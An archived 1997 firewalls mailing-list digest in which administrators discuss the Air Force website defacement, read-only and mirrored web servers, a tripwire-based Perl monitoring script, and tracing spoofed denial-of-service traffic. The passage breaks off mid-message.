From firewalls-owner Wed Jan 1 06:13:58 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA19184 for firewalls-outgoing; Wed, 1 Jan 1997 06:03:11 -0800 (PST) Received: from finwds01.tu-graz.ac.at (finwds01.tu-graz.ac.at [129.27.138.60]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA19176 for ; Wed, 1 Jan 1997 06:03:04 -0800 (PST) Received: from finwal01.tu-graz.ac.at (tom@finwal01.tu-graz.ac.at [129.27.138.63]) by finwds01.tu-graz.ac.at (8.8.4/8.8.4) with SMTP id PAA25418; Wed, 1 Jan 1997 15:02:34 +0100 Received: from localhost by finwal01.tu-graz.ac.at; (5.65v3.2/1.1.8.2/18Mar95-0456PM) id AA03087; Wed, 1 Jan 1997 15:02:34 +0100 Date: Wed, 1 Jan 1997 15:02:34 +0100 (MET) From: Thomas Leitner X-Sender: tom@finwal01.tu-graz.ac.at To: Chris Plunkett Cc: firewalls@GreatCircle.COM Subject: Re: Air Force Web Site Hacked In-Reply-To: <32C9B1A6.2B5F@opensys.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 31 Dec 1996, Chris Plunkett wrote: > > Slackware Linux has a useable filesystem on CD-ROM, however the boot > > partition still has to be HD or Floppy. One thing that puzzles me about > > bootable media is if you have a bootable CD, how does it install the > > drivers for itself to read from the CD to actually start reading the boot > > sector (which supposedly is on the CD). Kind of a Catch-22. Forgive me, but > > I'm no PC guru... > > Or, you could get a SUN and type boot cd. As far as I know, this does *not* run with a RO filesystem. It rather creates an in-memory writeable root filesystem (ramdisk in PC-speak) Tom -------------------------------------------------------------------------- T o m L e i t n e r Dept. of Communications Graz University of Technology, e-mail : tom@finwds01.tu-graz.ac.at Inffeldgasse 12 Phone : +43-316-873-7455 A-8010 Graz / Austria / Europe Fax : +43-316-463-697 Home page : http://wiis.tu-graz.ac.at/people/tom.html PGP public key on : ftp://wiis.tu-graz.ac.at/pgp-keys/tom.asc or send mail with subject "get Thomas Leitner" to pgp-public-keys@keys.pgp.net -------------------------------------------------------------------------- From firewalls-owner Wed Jan 1 06:28:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA19147 for firewalls-outgoing; Wed, 1 Jan 1997 06:00:31 -0800 (PST) Received: from finwds01.tu-graz.ac.at (finwds01.tu-graz.ac.at [129.27.138.60]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA19140 for ; Wed, 1 Jan 1997 06:00:22 -0800 (PST) Received: from finwal01.tu-graz.ac.at (tom@finwal01.tu-graz.ac.at [129.27.138.63]) by finwds01.tu-graz.ac.at (8.8.4/8.8.4) with SMTP id OAA25336; Wed, 1 Jan 1997 14:59:51 +0100 Received: from localhost by finwal01.tu-graz.ac.at; (5.65v3.2/1.1.8.2/18Mar95-0456PM) id AA03063; Wed, 1 Jan 1997 14:59:49 +0100 Date: Wed, 1 Jan 1997 14:59:49 +0100 (MET) From: Thomas Leitner X-Sender: tom@finwal01.tu-graz.ac.at To: Paul Ferguson Cc: Mark Johnson , Gene Lee , Dale Drew , Michael Idengren , Christopher Klaus , "firewalls@GreatCircle.COM" Subject: Re: Air Force Web Site Hacked In-Reply-To: <3.0.32.19961231180249.006b8f24@lint.cisco.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 31 Dec 1996, Paul Ferguson wrote: > Frankly, I think the suggestion of using non-writable media (ie. CD-ROMs) > is rather unpractical. Most sufficiently interesting web sites contain > ever-changing & constantly updated information, such as news, various > daily features, etc. > > Not a practical solution. O.K. If you want to be really secure and still updateable, do this: 1.) Use two mirrored disks. One is mounted read-only one is mounted read/write. The two disks can contain not only the WEB data but the whole operating system as well. As someone already noted before: Linux (and I'm sure other Unixes as well) can be setup to run from an RO media. 2.) When updates are required: Mount the second mirror disk r/w, do the update and reboot from the second mirror disk which is now mounted read-only. If the system is setup properly, the reboot time and thus the outage time can be kept quite low. 3.) When the system comes up, mount the first disk RW and apply the updates as well to keep the disk contents in sync. If the outage during the update is unacceptable what about using two mirror machines: One standby and RW for updates and one on-line running RO. After the update, machines could swap their functions immediately. Sure: This would require some fancy IP address setup. Tom -------------------------------------------------------------------------- T o m L e i t n e r Dept. of Communications Graz University of Technology, e-mail : tom@finwds01.tu-graz.ac.at Inffeldgasse 12 Phone : +43-316-873-7455 A-8010 Graz / Austria / Europe Fax : +43-316-463-697 Home page : http://wiis.tu-graz.ac.at/people/tom.html PGP public key on : ftp://wiis.tu-graz.ac.at/pgp-keys/tom.asc or send mail with subject "get Thomas Leitner" to pgp-public-keys@keys.pgp.net -------------------------------------------------------------------------- From firewalls-owner Wed Jan 1 06:43:54 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20130 for firewalls-outgoing; Wed, 1 Jan 1997 06:36:37 -0800 (PST) Received: from ian.south-border.com (ian.mnsinc.com [206.239.152.197]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA20121 for ; Wed, 1 Jan 1997 06:36:27 -0800 (PST) Received: (qmail 25884 invoked from network); 1 Jan 1997 14:35:51 -0000 Received: from sparc.south-border.com (128.26.242.90) by sunspot-thin.south-border.com with SMTP; 1 Jan 1997 14:35:50 -0000 Received: from sparc.south-border.com (localhost [127.0.0.1]) by sparc.south-border.com (8.8.4/8.8.4) with ESMTP id JAA01074; Wed, 1 Jan 1997 09:35:48 -0500 (EST) Message-Id: <199701011435.JAA01074@sparc.south-border.com> To: Brad Daugherty cc: Mark Johnson , Dale Drew , Michael Idengren , Christopher Klaus , firewalls@GreatCircle.COM Subject: Re: WWW Gaffiti Immunity (Off Topic) In-reply-to: Your message of "Tue, 31 Dec 1996 14:57:19 PST." <3.0.32.19961231145712.00a49df8@lexicon.ins.com> Date: Wed, 01 Jan 1997 09:35:47 -0500 From: The Unseen Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <3.0.32.19961231145712.00a49df8@lexicon.ins.com>, Brad Daugherty slapped a few random keys to produce: >>> I don't see how CDROM provides significant advantages on a WEB server >>> "graffiti" attack. > >In order to avoid graffiti try something like this: > >1)Write a program that checks the size/date of the WWW directory > If it fails have it Kill the WWW server > and send email to the admin. >2)Setup a CRON job to run the program every 15 min. > >If a hacker is good enough they will find it, but who would be looking for suc >h a random thing? > >Just make sure you change the size whenever you make a change to your document >s. Or better yet, incorperate tripwire with MD5 file signatures into this scheme instead of rolling your own. Use perl to scan for perticular files that may have changed taking guestbooks "public" growable files into account. Some ideas, Ian From firewalls-owner Wed Jan 1 06:58:53 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20909 for firewalls-outgoing; Wed, 1 Jan 1997 06:48:52 -0800 (PST) Received: from hamlin.cc.boun.edu.tr (hamlin.cc.boun.edu.tr [193.140.192.9]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA20880 for ; Wed, 1 Jan 1997 06:48:33 -0800 (PST) Received: from ReAlbi.cc.boun.edu.tr by hamlin.cc.boun.edu.tr (AIX 4.1/UCB 5.64/4.03) id AA25930; Wed, 1 Jan 1997 16:43:37 +0300 Message-Id: <32CA7888.477CA5C1@boun.edu.tr> Date: Wed, 01 Jan 1997 16:45:28 +0200 From: Can Baysal Organization: Bogazici University Computer Center X-Mailer: Mozilla 3.01Gold (X11; I; Linux 1.3.20 i586) Mime-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: Air Force Web Site Hacked References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thomas Leitner wrote: > > ................ > If the outage during the update is unacceptable what about using > two mirror machines: One standby and RW for updates and one > on-line running RO. After the update, machines could swap their > functions immediately. Sure: This would require some fancy IP > address setup. Well, assuming that one has enough funds, IBM's HACMP can be installed (onto IBM systems :). So there should not be a problem while configuring IP (and this is not the only benefit). IMHO it is not so good for installations those are having so much users (espacially if you want to keep them online while switching) like our 10000+, but very suitable, if you want to back your data servers up (like ftp and http). Regards; Can Baysal > > Tom > > -------------------------------------------------------------------------- > T o m L e i t n e r Dept. of Communications > Graz University of Technology, > e-mail : tom@finwds01.tu-graz.ac.at Inffeldgasse 12 > Phone : +43-316-873-7455 A-8010 Graz / Austria / Europe > Fax : +43-316-463-697 > Home page : http://wiis.tu-graz.ac.at/people/tom.html > PGP public key on : ftp://wiis.tu-graz.ac.at/pgp-keys/tom.asc or send > mail with subject "get Thomas Leitner" to pgp-public-keys@keys.pgp.net > -------------------------------------------------------------------------- From firewalls-owner Wed Jan 1 07:14:06 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA21843 for firewalls-outgoing; Wed, 1 Jan 1997 07:02:21 -0800 (PST) Received: from panix3.panix.com (panix3.panix.com [198.7.0.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA21835 for ; Wed, 1 Jan 1997 07:02:14 -0800 (PST) Received: from localhost (fangyou2@localhost) by panix3.panix.com (8.8.4/8.7/PanixU1.3) with SMTP id KAA01190 for ; Wed, 1 Jan 1997 10:02:52 -0500 (EST) Date: Wed, 1 Jan 1997 10:02:51 -0500 (EST) From: FaNgYoU2 To: firewalls@GreatCircle.com Subject: Re: LDAP In-Reply-To: <199701010454.XAA02712@mail.clark.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >Any of you hot shot vendors ... > > ... doing any work to include > >LDAP enterprise directory access in firewalls? > > V-one is doing some stuff with LDAP ... What I had in mind was to try to get an idea of what would be involved in a migration strategy to move from fragmented directory services on different platforms to an enterprise directory that included firewalls as follows: Banyan Vines } LDAP Novel Netware } access Packet Proxy Choke Lotus Notes }--enterprise--|--filtering--fire--filtering--|--Internet Assorted Unix's} directory | router wall router | Windows Nt } | | Packet External filtering hardend router DNS server | Packet filtering--Corporate firewall Intranet This is essentially a split DNS to hide the corporate network. The external DNS would provide minimal DNS information on a skeletonized Unix box, while the internal LDAP access enterprise directory would provide directory information for everything. ^ ^ From firewalls-owner Wed Jan 1 10:46:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA29978 for firewalls-outgoing; Wed, 1 Jan 1997 10:38:47 -0800 (PST) Received: from tophat.stetson.edu (tophat.stetson.edu [147.253.10.40]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA29969 for ; Wed, 1 Jan 1997 10:38:38 -0800 (PST) Received: from localhost (midengre@localhost) by tophat.stetson.edu (8.8.3/8.7.3) with SMTP id NAA17983; Wed, 1 Jan 1997 13:37:00 -0500 (EST) Date: Wed, 1 Jan 1997 13:37:00 -0500 (EST) From: Michael Idengren X-Sender: midengre@tophat To: Paul Ferguson cc: Mark Johnson , firewalls@GreatCircle.COM Subject: Re: Denial of service (was Re: Air Force Web Site Hacked) In-Reply-To: <3.0.32.19961231222828.006b99dc@lint.cisco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > the world, but a simple-minded denial-of-service attack makes it > almost an effort in futility if connectivity is your lifeblood. Speaking of denial-of-service attacks, how would one go about tracing packets with a false IP header? The delimma here is that we have got our router configured properly so that it doesn't let any packets leave our network with false headers. But there's a whole slew of people out there with routers who either don't care or don't know how to filter bad outgoing packets. This presents a big problem for us if someone decides to execute a denial of service on us, or even do a simple IP spoof in a hacking attempt so we can't trace them. Any Suggestions? Mike Idengren | MEISTER ---------------------------------+---------------------------------- Center for Information Technology| Alachua Free-Net IRC Administrator Stetson University | WorldWide Free-Net IRC Network Coordinator From firewalls-owner Wed Jan 1 10:59:01 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA00247 for firewalls-outgoing; Wed, 1 Jan 1997 10:44:43 -0800 (PST) Received: from tophat.stetson.edu (tophat.stetson.edu [147.253.10.40]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA00240 for ; Wed, 1 Jan 1997 10:44:36 -0800 (PST) Received: from localhost (midengre@localhost) by tophat.stetson.edu (8.8.3/8.7.3) with SMTP id NAA18146; Wed, 1 Jan 1997 13:43:01 -0500 (EST) Date: Wed, 1 Jan 1997 13:43:01 -0500 (EST) From: Michael Idengren X-Sender: midengre@tophat To: Norm Laudermilch cc: firewalls@GreatCircle.COM Subject: Re: Air Force Web Site Hacked In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I do think read-only media is an interesting idea, by the way :) Dale is > right though, there are still vulnerabilities. Personally, I like the idea > of marking the files immutable myself. This way, even root can't change the > content unless the machine is brought down into single-user mode. Not sure > how many other operating systems support this other than (the great) BSDI > though. I just have a couple of points to bring up on this thread: 1. My comment was partially meant as a joke, it's horribly impractical for ISP's and Univerisities and such to require operator intervention every time a webpage needs to be updated. Such a level of paranoia *might* only be appropriate for government agencies and authoritative advanced research sites. 2. With regards to marking files immutable: If I really wanted to secure a file, I wouldn't do it with software security. No way no how absolutely not - this is the whole point, hardware-level security is the entire point behind R/O media. I myself would only feel comfortable with jumpering the hard drive as read-only or mounting a CD-ROM if I ever had to go to such a level of paranoia. Mike Idengren | MEISTER ---------------------------------+---------------------------------- Center for Information Technology| Alachua Free-Net IRC Administrator Stetson University | WorldWide Free-Net IRC Network Coordinator From firewalls-owner Wed Jan 1 11:10:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA29949 for firewalls-outgoing; Wed, 1 Jan 1997 10:37:39 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA29938 for ; Wed, 1 Jan 1997 10:37:28 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id KAA28468 for ; Wed, 1 Jan 1997 10:36:59 -0800 (PST) Message-Id: <3.0.32.19970101133656.006c28e4@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 01 Jan 1997 13:36:59 -0500 To: Firewalls Mailing List From: Paul Ferguson Subject: Edupage excerpt Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk FYI. - paul [snip] >Date: Tue, 31 Dec 1996 15:29:42 -0500 (EST) >From: Edupage Editors >Subject: Edupage, 31 December 1996 [snip] > >AIR FORCE WEB PAGE HACKED INTO BY VANDALS >The U.S. Air Force's home page on the World Wide Web < http://www.af.mil > >was broken into Monday afternoon and replaced with a pornographic image, >obscenities, and anti-government tirades. Identifying himself only as a >23-year-old San Diego "business man," the individual who claimed >responsibility for the invasion told a reporter by telephone: "This was a >complete server takeover. We literally could have dismantled all the >electronic information, including e-mail." The man said that he and the >individuals who participated with him in the vandalism "didn't do any >damage," and claimed that, "We did it simply to show them you've got to >upgrade security. The security is simply pathetic on government systems, >and it's not stopping anyone. One of the people involved in the actual >break-in was only 15. A foreign government could go through that security >in a few minutes." He gave himself only 50-50 odds of not being caught, and >predicted: "The government is going to treat this very, very seriously. >The illegality of this is extreme." The Air Force Office of Special >Investigations and the Federal Bureau of Investigations are investigating >the break-in. (New York Times 31 Dec 96 A9) > [snip] -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jan 1 11:14:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA01310 for firewalls-outgoing; Wed, 1 Jan 1997 11:04:03 -0800 (PST) Received: from ian.south-border.com (ian.mnsinc.com [206.239.152.197]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA01280 for ; Wed, 1 Jan 1997 11:03:44 -0800 (PST) Received: (qmail 1871 invoked from network); 1 Jan 1997 19:03:11 -0000 Received: from sparc.south-border.com (128.26.242.90) by sunspot-thin.south-border.com with SMTP; 1 Jan 1997 19:03:10 -0000 Received: from sparc.south-border.com (localhost [127.0.0.1]) by sparc.south-border.com (8.8.4/8.8.4) with ESMTP id OAA02003; Wed, 1 Jan 1997 14:03:07 -0500 (EST) Message-Id: <199701011903.OAA02003@sparc.south-border.com> To: firewalls@GreatCircle.COM cc: Brad Daugherty , Mark Johnson , Dale Drew , Michael Idengren , Christopher Klaus Subject: Re: WWW Gaffiti Immunity (Off Topic) In-reply-to: Your message of "Wed, 01 Jan 1997 09:35:47 EST." <199701011435.JAA01074@sparc.south-border.com> Date: Wed, 01 Jan 1997 14:03:03 -0500 From: The Unseen Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <199701011435.JAA01074@sparc.south-border.com>, The Unseen slapped a few random keys to produce: >In message <3.0.32.19961231145712.00a49df8@lexicon.ins.com>, >Brad Daugherty slapped a few random keys to produce: >>>> I don't see how CDROM provides significant advantages on a WEB >server >>>> "graffiti" attack. >> >>In order to avoid graffiti try something like this: >> >>1)Write a program that checks the size/date of the WWW directory >> If it fails have it Kill the WWW server >> and send email to the admin. >>2)Setup a CRON job to run the program every 15 min. >> >>If a hacker is good enough they will find it, but who would be looking >for suc >>h a random thing? >> >>Just make sure you change the size whenever you make a change to your >document >>s. > >Or better yet, incorperate tripwire with MD5 file signatures into this >scheme instead of rolling your own. Use perl to scan for perticular >files >that may have changed taking guestbooks "public" growable files into >account. > >Ian Unusual for me answer my own E-mail... 8-) Here's my donation... (no flames please) Please keep in mind that I just created this off the top of my head. You are more than welcome to alter/tailor to your needs... Ian ------- #!/usr/local/bin/perl # # The purpose of this script is to help secure our WWW files # from grafitti. We are going to use tripwire to help us keep # track of file signatures and alert us when there are major # inconsistancies that may result from someone trying to hack # our site. # # Ideal config consists of a WWW server mounting via NFS the # document tree. This script is intended to be run on the # NFS server. # # Feel free to distribute and/or alter this script as needed. # But be kind and email me the changes... ian@south-border.com package WWWcheck; $Alert=0; @SendData=(); # Specify the email address of the admin you want information # mailed to. $AdminUser="securityuser"; # Specify the metheod of emailing. $SendmailCMD="/usr/lib/sendmail -t"; # The following variables define where tripwire is. Specify # the correct database and config files to be given to tripwire # as options. Tripwire will run in quiet mode to eliminate # pass babble. $TripCMD="/place/to/bin/tripwire"; $TripDatabase="/place/to/tripwire/www.database"; $TripConfigFile="/place/to/tripwire/WWW.conf"; # If your WWW server mounts it's document tree via NFS from # a hardened server and this script and tripwire run on the # NFS server, set DoNFSshare to 1. This will unshare the NFS # directory after a grace period defined below. $DoNFSshare=1; $NFSunsharecmd="/usr/sbin/unshare"; $NFSwwwdir="/place/to/real/NFS/server/WWW"; # Change this to 1 to kill the httpd server remotely based on # the outcome of tripwire. Be sure to review RemoteHttpKill, # RemoteHost, and RemoteCMD. I like ssh because of the key # exchange. $DoRemoteKill=1; # These are used when DoRemoteKill is set to 1 $RemoteCMD="/opt/PUBsshd/bin/ssh"; $RemoteHost="WWW"; $RemoteHttpKill="/etc/init.d/httpd stop"; # This defines how long to wait gracefully before proceeding # with killing the httpd server and NFS server. $SleepTime="sleep 3600"; #<----you do not need to change anything below here---> # Issue tripwire command with options. Compile a list of # changes that have occured from the last update of the # tripwire database. Save these modifications to be sent # as a notification to the admin. sub BuildTripDatabase { open(Tripdata,"$TripCMD -d $TripDatabase -c $TripConfigFile -q|"); while() { split; chop; push(@SendData,$_); } } sub AlertAdmin { if(@SendData == '') { return; } open(ALERT,"|$SendmailCMD"); print ALERT "To:$AdminUser\n"; print ALERT "cc:\n"; print ALERT "subject: WWW server Document tree\n"; print ALERT "-------\n"; print ALERT "Has changed since the last tripwire database update. Here\n"; print ALERT "is a summery of the output from tripwire run at \n\n\n"; for(@SendData) { print ALERT "$_\n"; } print ALERT "\nThe following actions will be taken...\n\n"; if($DoNFSshare == '1' && $DoRemoteKill == '1') { print ALERT "Your WWW server mounts it's document tree via NFS from\n"; print ALERT "this server and you have elected to kill the remote httpd\n"; print ALERT "daemon running on the WWW server. The following command will\n"; print ALERT "issued:\n\n"; print ALERT "$SleepTime ; $NFSunsharecmd $NFSwwwdir ; $RemoteCMD $RemoteHost '($RemoteHttpKill)\n\n"; close(ALERT); return; } if($DoNFSshare == '1') { # print STDERR `$SleepTime ; $NFSunsharecmd $NFSwwwdir 2>1 &`; print ALERT "Your WWW server is mounting it's document tree via an NFS\n"; print ALERT "server which is this host according to variables set. The\n"; print ALERT "following command will be issued:\n\n"; print ALERT "$SleepTime ; $NFSunsharecmd $NFSwwwdir\n\n"; } if($DoRemoteKill == '1') { # print STDERR `$RemoteCMD $RemoteHost '($SleepTime ; $RemoteHttpKill) &'`; print ALERT "According to our options you have elected to disable httpd\n"; print ALERT "service on the WWW server. the following command will be\n"; print ALERT "issued:\n\n"; print ALERT "$RemoteCMD $RemoteHost '($SleepTime ; $RemoteHttpKill)\n\n"; } if($DoNFSshare == '0' && $DoRemoteKill == '0') { print ALERT "Although we have detected differences that may indicate an\n"; print ALERT "attack, options set tell us that we are to take no action\n"; print ALERT "in response. YOU MUST CHECK to see if this is really the\n"; print ALERT "intended reaction to the tripwire output!\n\n"; } close(ALERT); } sub PerformKill { if($DoNFSshare == '1' && $DoRemoteKill == '1') { print STDERR `$SleepTime ; $NFSunsharecmd $NFSwwwdir ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'`; return; } if($DoNFSshare == '1') { print STDERR `($SleepTime ; $NFSunsharecmd $NFSwwwdir)`; } if($DoRemoteKill == '1') { print STDERR `$SleepTime ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'`; } } sub main { &BuildTripDatabase(); &AlertAdmin(); &PerformKill(); } package main; &WWWcheck'main(); From firewalls-owner Wed Jan 1 11:43:57 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA03518 for firewalls-outgoing; Wed, 1 Jan 1997 11:31:13 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA03491 for ; Wed, 1 Jan 1997 11:31:03 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id LAA05069; Wed, 1 Jan 1997 11:29:59 -0800 (PST) Message-Id: <3.0.32.19970101142953.0069e384@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 01 Jan 1997 14:30:00 -0500 To: Michael Idengren From: Paul Ferguson Subject: Re: Denial of service (was Re: Air Force Web Site Hacked) Cc: Daniel Senie , firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 01:37 PM 1/1/97 -0500, Michael Idengren wrote: > >Speaking of denial-of-service attacks, how would one go about tracing >packets with a false IP header? > I assume that you mean spoofed source addresses here when you mention 'false IP headers'. This is a tough problem, and being on the receiving end of this, there's really no much you can do at this point. I also assume that what you refer to below as 'we have got our router configured properly so that it doesn't let any packets leave our network with false headers' is traffic filtering on ingress to ensure that only traffic originating from valid downstream prefixes (ones which you are advertizing upstream) is allowed to traverse the intermediate next hop (your router), as described in draft-ferguson-ingress-filtering-01.txt. My coauthor, Daniel Senie [Proteon], and I are going to be submitting an update to this draft (and perhaps subsequent updates) so that we can get this moving for publication as an Informational RFC. We're still waiting to incorporate some additional text & comments into the document on how it breaks certain technologies (such as mobile IP). As an aside, there are several discussions surrounding the use of bogus source addresses in any denial-of-service attack. One such discussion involves what type of DoS attack we're talking about here; TCP SYN or UDP flooding. In the case of TCP SYN attacks, one might argue that if the source address, whether bogus or not, does not exist in the routing table, then completion of the three-way handshake should not be negotiated by the receiver. This would appear to be a simple defense. A more insidious attack method (also mentioned in the draft), however, is one in which a bogus source address is used by the attacker, but which is actually a valid, routable, reachable prefix in the routing table, but which actually belongs to another end-system. The end result is an exercise for the reader. Any TCP SYN attack which uses reachable prefixes, and are bogus source addresses of the true originator, is a hard problem to solve. There are several devices which have been recently introduced which proxy the SYN/ACK between originator & destination host which do not attempt to complete the three-way handshake after 'x' number of SYN's, however, I won't mention them by name in this forum. There will probably be additional features such as this introduced in the near future. Also, there are several OS vendors which have enhanced the way their particular operating system handles this type of attack by increasing the appropriate queue depths & decreasing the appropriate timer values. I won't reference them either. In any event (and back to the original question), tracing an attack back to the true originator is tough, and requires the assistance of network administrators within each administrative domain the attack traverses on an autonomous system hop-by-hop basis. If you can trace the attack on a hop-by-hop basis, gleaning previous hop information, the attacker can be traced to its true source. In an ideal world, one might expect the various Internet service providers to cooperate in tracking down the perpetrator of such an attack; in the Real World (tm), sometimes the amount of cooperation leaves a lot to be desired. This is not to say, however, that it cannot be done; in fact, it was successfully done just recently to track down the perpetrator of such an attack. Prosecuting them is another issue entirely. ;-) So, what can you do? Log, log, log. And more logging. And get to know the security administrator upstream from you. - paul >The delimma here is that we have got our router configured properly so >that it doesn't let any packets leave our network with false headers. But >there's a whole slew of people out there with routers who either don't >care or don't know how to filter bad outgoing packets. This presents a >big problem for us if someone decides to execute a denial of service on >us, or even do a simple IP spoof in a hacking attempt so we can't trace >them. > >Any Suggestions? > -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jan 1 12:02:52 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA06158 for firewalls-outgoing; Wed, 1 Jan 1997 11:55:32 -0800 (PST) Received: from deere-bh.dx.deere.com (deere-bh.dx.deere.com [207.122.201.66]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA06132 for ; Wed, 1 Jan 1997 11:55:21 -0800 (PST) Received: (from uucp@localhost) by deere-bh.dx.deere.com (8.6.12/8.6.11) id NAA10695; Wed, 1 Jan 1997 13:55:01 -0600 Received: from deere.dx.deere.com by deere-bh.dx.deere.com via smap (V1.3) id sma010677; Wed Jan 1 13:54:57 1997 Received: from 90.deere.com (dts.90.deere.com) by deere.dx.deere.com (4.1/SMI-4.0) id AA27398; Wed, 1 Jan 97 13:54:15 CST Received: from bc17684.deere.com by 90.deere.com (SMI-8.6/SMI-SVR4) id NAA23887; Wed, 1 Jan 1997 13:52:19 -0600 Message-Id: <32CAB321.2EBC@90.deere.com> Date: Wed, 01 Jan 1997 12:55:29 -0600 From: Bertrum Carroll Organization: Deere & Company X-Mailer: Mozilla 2.01Gold (Win95; I) Mime-Version: 1.0 To: Brad Daugherty Cc: Mark Johnson , Dale Drew , Michael Idengren , Christopher Klaus , firewalls@GreatCircle.COM Subject: Re: WWW Gaffiti Immunity (Off Topic) References: <3.0.32.19961231145712.00a49df8@lexicon.ins.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brad, I agree with you, but it looks like you just described "TripWire"? What OS & Webserver does the Airforce use? Brad Daugherty wrote: > > >> I don't see how CDROM provides significant advantages on a WEB server > >> "graffiti" attack. > > In order to avoid graffiti try something like this: > > 1)Write a program that checks the size/date of the WWW directory > If it fails have it Kill the WWW server > and send email to the admin. > 2)Setup a CRON job to run the program every 15 min. > > If a hacker is good enough they will find it, but who would be looking for such a random thing? > > Just make sure you change the size whenever you make a change to your documents. > > As for CD-ROM WWW sites, I believe the term "Link-rot" comes to mind. > > Good Luck, > Brad > > Providing The Power Of Operable Networks > Brad Daugherty - Associate Network Systems Engineer > PHONE:(630)942-5770 PAGE:(800)467-1467 FAX:(630)545-0068 > Lifetime: From firewalls-owner Wed Jan 1 12:29:17 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA08160 for firewalls-outgoing; Wed, 1 Jan 1997 12:19:24 -0800 (PST) Received: from heather.greatbasin.com (heather.greatbasin.com [140.174.194.41]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA08153 for ; Wed, 1 Jan 1997 12:19:17 -0800 (PST) Received: from marks (hercules.reno.nv.us [204.94.161.224]) by heather.greatbasin.com (8.8.4/8.7.3) with SMTP id MAA26827; Wed, 1 Jan 1997 12:18:42 -0800 (PST) Message-ID: <32CAC80A.562C@hercules.reno.nv.us> Date: Wed, 01 Jan 1997 12:24:42 -0800 From: Mark Johnson X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 To: Michael Idengren CC: Norm Laudermilch , firewalls@GreatCircle.COM Subject: Re: Air Force Web Site Hacked References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Michael Idengren wrote: > 1. My comment was partially meant as a joke, it's horribly impractical > for ISP's and Univerisities and such to require operator intervention > every time a webpage needs to be updated. Such a level of paranoia > *might* only be appropriate for government agencies and authoritative > advanced research sites. > > 2. With regards to marking files immutable: If I really wanted to secure > a file, I wouldn't do it with software security. No way no how absolutely > not - this is the whole point, hardware-level security is the entire point > behind R/O media. I myself would only feel 